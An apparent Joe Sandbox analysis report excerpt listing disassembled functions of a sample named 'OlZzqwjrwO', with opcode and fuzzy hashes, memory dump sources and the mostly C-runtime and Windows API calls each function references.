Opcode Fuzzy Hash: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
Instruction Fuzzy Hash: 04124A75A08305AFCB14EF29C48066AF7E1FF88314F19892DE899D7351D774E855CB82

Function 0041316D Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
Instruction ID: a0aa4bf3e4d537a92ce93f9e726837fc264071e7a9162c3afbdc2585123e9ce0
Opcode Fuzzy Hash: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
Instruction Fuzzy Hash: 70021270510B508FC338CF29C6905AABBF1BF45711B944A2EDAA787B90D739F985CB18

Function 0041E083 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
Instruction ID: b31777eaf4445a5ca230d2489b0392e25bee96f51372df8947d9b7d5b3c35a4e
Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
Instruction Fuzzy Hash: FAE1D179A083168FC714CF19C4D06AAB3E2BF99710F55892EED9587381D339E8868B85

Function 00429A5B Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
Instruction ID: 7aad21176e94204ebf9be3326ef5f875fb6c76e3886be83ba2785e1930059451
Opcode Fuzzy Hash: 363acbbdeab20fcea08c686e9da4600208a3b96b3fab0763692ee7983efd47cc
Instruction Fuzzy Hash: CED1D1716083154FD30CCF5DC89532AFBE5ABC8710F4A892EE999DB3A1D6B8DC058B85

Function 00441057 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
Instruction ID: 05fb3061c803852ccbcb55ec79df352ea4c9045d55e38e7908647069224f19b4
Opcode Fuzzy Hash: 7d24e026ab002554a5cc82306c4c121f3aa2aa126a956a255deec92847530bab
Instruction Fuzzy Hash: DAC1AF30A006468EFB24CF58C480AABB7B2BB09304F14465FD956D7BB1D778ADC6CB59

Function 0044234A Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
Instruction ID: 86255bcc3f122f9cb2bdcdd6b3c86e7cac227984b0ae32171133bf816eefb62b
Opcode Fuzzy Hash: ee76e20e5c37595785789d759f783c4b647590ae66676044ba7df5895097dc4f
Instruction Fuzzy Hash: 0EC1EE70A006469FEB28CF28C69066FBBB1EF05304F94461FF85697391C7B8AD46CB59

Function 00410A33 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
Instruction ID: be4b2c5f41c1c6b016d0662a1a3aa3dff1cc49737e4a0fee46609b29334a7491
Opcode Fuzzy Hash: 22a249e8036389ca2a94441644932b39595e3d331b0a1c1fbadceed0361bbadf
Instruction Fuzzy Hash: C3C18E716087518BC728CF1CC4903AEB7E2AFC4310F19CA2EE999D7795D7789881CB96

Function 00418413 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
Instruction ID: ecdb7d8b3c128cef4b5a8eef640ce4e1348b954c5e1c8cc4e6b72fcb2b8dd03a
Opcode Fuzzy Hash: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
Instruction Fuzzy Hash: 07C18F70608386AFC714CF28C84469ABFA1BF65304F04865EF8994B782D774DA68CB96

Function 00429730 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
Instruction ID: 33946987a401538ec29d146c49bd0777ead14b37c14ca5df7bbf2076656dae12
Opcode Fuzzy Hash: dc47058bb36163437909b73a5b85653ba8b3b080b3ce5340834d88d047b42e12
Instruction Fuzzy Hash: FB9116327041214FD35CDB3D8D66529FBE6ABC9244F49CA3EE08ACB292E974DA13C751

Function 004109FC Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
Instruction ID: 2f1fa1f2c0ce5c767d39326a4a7df2626eefc8e715aa17eb357957d79dd35fa3
Opcode Fuzzy Hash: a39a2fe1fb783dc0ebd96aaa4b09021d3a3dec2b0e9adff76d855defd5a20da3
Instruction Fuzzy Hash: 7A8171716087518BC728CF2DC8906AEFBE2AFC4310F19CA2EE8D9D7795D6349881CB55

Function 008A4853 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
Instruction ID: e61bd3d5f4c1d0ea3930c949371c51ac59effd1b2c2b18729440be567b327baa
Opcode Fuzzy Hash: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
Instruction Fuzzy Hash: 7B710671908385CFEF288F89908122DF6E0FBC6314F256D2FE495DBA60D2B9C8858757

Function 008A9997 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
Instruction ID: e94d8a6693356bd2d11a5b393076eb1e4069b17a0671e4e8b3a6b83e402b3bd2
Opcode Fuzzy Hash: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
Instruction Fuzzy Hash: 08510733B046164FC34CEA7D8D9216AF6D6ABC8254B46CA3ED44ADB391F970DA128681

Function 0044915B Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
Instruction ID: 7f6a3678a30058b370d0d799ec085ce4703b2b826dd53e06f65c8239fe1aa67b
Opcode Fuzzy Hash: fcdd6333bcced19b981ab71a904a24c27a086616c56a7af56b535d3d20f827b4
Instruction Fuzzy Hash: FE516E71E00119AFEF04CF99C941AAFBBB2FF88304F19849DE815AB201C7749E51DB95

Function 008A2152 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction ID: 28bd7a5a0148f78c6f989ab348d5836f55a38bf309a10c017276325910812bb9
Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction Fuzzy Hash: 5C517131E0421ACBEF358A9C888066DBAB4FB17724F254617E615F7BA0C334ED84CB42

Function 00424995 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
Instruction ID: 0a1bca97f873a7a6d6a3aaff04d58e0ae48002bfba7cab88bc6042a4b6745ab0
Opcode Fuzzy Hash: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
Instruction Fuzzy Hash: F841F2726013149FD320DF15DC80B26B7E4FF84718F16452AED4587725E778F850CA99

Function 0043D8D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: affec256aca3101603e5e9c8b6c14aac85f880b69ce3fa9b32540f72830965cb
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 62113BF7A0104243D7058A2DF9B47B7D395EFCE320F2C626BD0514B758D12AE9459608

Function 00422817 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
Instruction ID: c3a51ff81cd43cadc2f91b9d343c289a0ae24623370d929bafb0354b6f338a0e
Opcode Fuzzy Hash: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
Instruction Fuzzy Hash: F61194B66002147FE3006F69DC85E27BADCEB44354F45817AFD089B212D639ED14C6A5

Function 00426A42 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
Instruction ID: 775a38982ecc14386774c10a2ff7988f4febef0241ab9f2fac4c7ed0a075f983
Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
Instruction Fuzzy Hash: 5F21AF71A002268FCB24CF58C890B6BB7B1FF86708F69865DC8066B342D775EC42CB95

Function 00979B5B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Offset: 00979000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_979000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 68901295b6a57772498564e95abf2ae43c8f4baf849f06757c8a7b0dd304864e
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 64113C73340100AFDB54DE55EC91FA673EAEB89360B298165E908CB356D679EC41C7A0

Function 00410218 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
Instruction ID: 5cf5f964e5d4fdf4ab25e9de6bfd162346dccf7c83c49c61d1a40ba7c9897cbe
Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
Instruction Fuzzy Hash: 36118A77A1827107D711CE759CE021AF7629BC622270F4376D981AB352C170EC5892D9

Function 00429EF7 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
Instruction ID: 5e6f75d6069618f27f4e8ece13d34dcb27fa1cb4973037488a19f9399b438bca
Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
Instruction Fuzzy Hash: 04E01A75A116849FD7018F25E994B007BA1E704B10F458066F800D7A79F3B86C80CF8E

Function 008AA15E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
Instruction ID: ab48da6bb73ea6f11754c2489eadc58114c305f60cbedb05e3b309eec18089fa
Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
Instruction Fuzzy Hash: B9E01A35A006849ED7028F25DC94B007BA1F715B10F448065E401D7E79F3B46C80CF4B

Function 004269E4 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
Instruction ID: 2572daf3ac28ea9ece149f63ca22f641f49709f61c5ee85f622209572a58cfb2
Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
Instruction Fuzzy Hash: 33D08C31365650AFCB41DB48DD42F00B3E0EB48B32F258282B830AB2F2C724FE41CA05

Function 0042F265 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10

Function 0045999F Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00459ABE
CatchIt.LIBVCRUNTIME ref: 00459C1D
_UnwindNestedFrames.LIBCMT ref: 00459D1E
CallUnexpected.LIBVCRUNTIME ref: 00459D39

Strings

csm, xrefs: 004599DC
x@F, xrefs: 00459AB5
csm, xrefs: 00459A49
csm, xrefs: 00459AF5

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$x@F
API String ID: 2332921423-3829711656
Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
Instruction ID: 2a8b5e3cbe88d0ad45d83a49b6c8541956edddbcc5d33c7cd0fd48112d7d16c1
Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
Instruction Fuzzy Hash: F9B16771800249EBCF19DFA5C8819AEB7B5FF04316F18415AEC116B213D338EE59CBA9

Function 0045C793 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045C0FF), ref: 0045C7AC

Strings

acos, xrefs: 0045C8E2
log, xrefs: 0045C809, 0045C818
exp, xrefs: 0045C82B, 0045C890
log10, xrefs: 0045C7EE, 0045C7FD
pow, xrefs: 0045C84A, 0045C8F4, 0045C941
asin, xrefs: 0045C8D9
sqrt, xrefs: 0045C8EB

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
Instruction ID: 82d02ba150d8eb4d5d6beeccfbe315dd90ac4e528bf330bfbd80dbdd17a07d9b
Opcode Fuzzy Hash: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
Instruction Fuzzy Hash: 585170B0900B0ADFCF149F69D8C81AEBBB0FB45316F14414BD881A6256DB788959CF5E

Function 0045466D Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00454B19: CreateFileW.KERNEL32(00000000,00000000,?,00454716,?,?,00000000,?,00454716,00000000,0000000C), ref: 00454B36

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76FCF770), ref: 00454781
__dosmaperr.LIBCMT ref: 00454788
GetFileType.KERNEL32(00000000), ref: 00454794
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76FCF770), ref: 0045479E
__dosmaperr.LIBCMT ref: 004547A7
CloseHandle.KERNEL32(00000000), ref: 004547C7
CloseHandle.KERNEL32(00455523), ref: 00454914
GetLastError.KERNEL32 ref: 00454946
__dosmaperr.LIBCMT ref: 0045494D

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
Instruction ID: 038922a14cfed84d654bc7e4756cd55dec8d6f56b9250bad4a8b086e30f44e5e
Opcode Fuzzy Hash: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
Instruction Fuzzy Hash: C4A13731A041449FCF189F68DC91BAE3BA0EB87329F14015EFC019F392DB78885AC75A

Function 004041F8 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 391COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00404418

Strings

null, xrefs: 00404226
%1.17g, xrefs: 00404273
true, xrefs: 0040439C
[,]{: }, xrefs: 0040432B
false, xrefs: 004043A3

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %1.17g$[,]{: }$false$null$true
API String ID: 4218353326-762322047
Opcode ID: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
Instruction ID: 8a31c525fd10ccff58647d80abb421e7a2f49e00f52c285c36168c55111fec75
Opcode Fuzzy Hash: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
Instruction Fuzzy Hash: E8B1E4F27043015BC701A9298C5062BA6DA9FD1318F19493FEF59E33C2FA7EDD16425A

Function 008B297F Relevance: 10.7, APIs: 7, Instructions: 234COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000D62), ref: 008B2AFB
DeleteDC.GDI32(00000002), ref: 008B2D68
DeleteObject.GDI32(?), ref: 008B2D71

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Delete$CompatibleCreateObject
String ID:
API String ID: 1022343127-0
Opcode ID: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
Instruction ID: 16104b6d5fed36e67c9919151c1c577002746cf357e3a7f13d25caacca3eed9f
Opcode Fuzzy Hash: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
Instruction Fuzzy Hash: 3881E7B190021E9FDF208F988CC99FE7F74FB19324F281516E518EA3A0D3758A419767

Function 0043D770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0043D7A7
___except_validate_context_record.LIBVCRUNTIME ref: 0043D7AF
_ValidateLocalCookies.LIBCMT ref: 0043D838
__IsNonwritableInCurrentImage.LIBCMT ref: 0043D863
_ValidateLocalCookies.LIBCMT ref: 0043D8B8

Strings

csm, xrefs: 0043D84D

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
Instruction ID: f027fe2574540ca3b1f88e77f7abec4aa80c90a537e94c27518ff210aad43bfc
Opcode Fuzzy Hash: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
Instruction Fuzzy Hash: 0041EA34D012089BCF14EF69D881A9F7BB5FF48318F14816BE8249B352D739EA15CB95

Function 0045299E Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
Instruction ID: 20f6fc253ed9e18728f1e3e0f73237be974277a9ced04a575444c598e2f27323
Opcode Fuzzy Hash: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
Instruction Fuzzy Hash: 05B1F574A04285AFDB15CF99C980BBE7BB1BF86305F14415BE80067393C7B89D4ACB69

Function 0044C5A0 Relevance: 9.3, APIs: 6, Instructions: 275COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
__FindPESection.LIBCMT ref: 0044C6D1
VirtualQuery.KERNEL32(83000000,2263B8EC,0000001C,2263B8EC,?,?,?), ref: 0044C7B6
__FindPESection.LIBCMT ref: 0044C7F3
_ValidateScopeTableHandlers.LIBCMT ref: 0044C813
__FindPESection.LIBCMT ref: 0044C82D

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
String ID:
API String ID: 2529200597-0
Opcode ID: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
Instruction ID: e40285013e32dfb27aa5986082f3d9acaacd06ee7156ac865e10eba53592a1aa
Opcode Fuzzy Hash: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
Instruction Fuzzy Hash: 71A1F375E022159BEB50CFA9D9C07BEB3A4EB49314F19412AD855E3361E739DC028FA8

Function 008C59C6 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 008C5B59
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C5B75
__allrem.LIBCMT ref: 008C5B8C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C5BAA
__allrem.LIBCMT ref: 008C5BC1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C5BDF

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
